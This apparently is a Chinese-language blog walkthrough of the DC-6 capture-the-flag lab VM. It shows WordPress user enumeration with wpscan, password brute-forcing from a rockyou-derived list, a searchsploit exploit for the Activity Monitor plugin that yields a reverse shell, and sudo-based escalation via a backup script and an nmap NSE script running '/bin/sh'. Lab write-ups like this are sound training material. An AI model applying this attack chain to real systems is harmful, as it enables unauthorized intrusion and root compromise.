

Twosmi1e's Blog.

DC-6渗透报告

Twosmi1e's Blog.

DC-6渗透报告

靶机渗透 wp

Word count: 340 / Reading time: 2 min

 2019/10/24   Share

• 
• 
• 
• 
• 

信息收集

靶机IP：192.168.61.147
nmap扫描

• 80 web服务 WordPress站点
• 22 ssh服务

wpscan扫描

wpscan --url http://wordy/ --enumerate p --enumerate t --enumerate u

发现了用户名

cat /usr/share/wordlists/rockyou.txt | grep k01 > dc6pass.txt

然后开始爆破

暴力破解

wpscan --url http://wordy/ -U dc6user.txt -P dc6pass.txt

找到密码
Username: mark, Password: helpdesk01
进入后台，有个插件 Activity monitor

searchsploit -m 45274.html

改一下这两处改成域名和kali的IP，然后本地访问

shell反弹回来，收集信息
找了半天找到一个提示

有graham的密码
Add new user: graham - GSo7isUM1D4 - done
切换用户 发现没有root权限的应用但是有jens的

graham@dc-6:/home/mark/stuff$ cat /home/jens/backups.sh
cat /home/jens/backups.sh
#!/bin/bash
tar -czf backups.tar.gz /var/www/html

提权

想到还开了22端口，用graham尝试连了一下，成功
这样操作比反弹的shell方便一点
用vim或者vi无法操作，用nano在后面添加一行

然后运行

graham@dc-6:~$ sudo -u jens /home/jens/backups.sh
jens@dc-6:/home/graham$ sudo -l

可以看到切换到了jens用户，/usr/bin/nmap有root权限
然后可以利用nmap来提权
参考链接：https://gtfobins.github.io/gtfobins/nmap/

jens@dc-6:/home/graham$ echo "os.execute('/bin/sh')">/tmp/root.nse
jens@dc-6:/home/graham$ sudo nmap --script=/tmp/root.nse

提权成功找到flag

原文作者: two_smi1e

原文链接: https://www.twosmi1e.com/2019/10/24/DC-6渗透报告/

发表日期: October 24th 2019, 4:55:34 pm

版权声明: 本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  thinkCMF任意内容包含漏洞分析
• Previous Post
  DC-5渗透报告

Powered by Hexotheme Archer

PV: :)

CATALOG

1. 1. 信息收集
2. 2. 暴力破解
3. 3. 提权



• Archive
• Tag
• Cate

Total : 36

2020

• 01/19redis未授权总结
• 01/12信息收集一些tips

2019

• 12/29总结2019
• 12/25Django的默认用户认证系统
• 12/25Django踩坑记录
• 12/25url跳转漏洞
• 12/25堆叠注入
• 11/28内网渗透学习（一）
• 11/12中间人攻击
• 11/05同源策略那些事
• 11/04WEB基础漏洞
• 10/25thinkCMF任意内容包含漏洞分析
• 10/24DC-5渗透报告
• 10/24DC-6渗透报告
• 10/23DC-4渗透报告
• 10/21DC-3渗透报告
• 10/17DC-2渗透报告
• 10/16DC-1渗透报告
• 10/16CVE-2019-10392：Jenkins Git client插件RCE复现

2018

• 12/20PHP反序列化
• 11/30汇编基础
• 11/26安洵杯writewp
• 11/20Linux网络编程基础
• 11/07CTF中的常见PHP漏洞
• 11/07计算机网络
• 11/01uint8_t / uint16_t / uint32_t /uint64_t数据类型详解
• 10/11phpmyadmin getshell姿势
• 10/04WampServer多端口配置
• 09/06密码学
• 08/18Crypto中RSA题目总结
• 08/03CTF中遇到的隐写术总结
• 07/15SCTF writeup
• 07/01ISCC writeup
• 02/10Mysql写入文件小技巧
• 02/02Python高级特性

2017

• 10/28纪念我逝去的青春

ctf php 漏洞复现 靶机渗透 wp Django 安全开发 学习笔记 web安全 总结 OWASP10 编程相关 中间人攻击 漏洞分析 内网 同源策略 前端安全 SQL注入 随笔



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

ctf

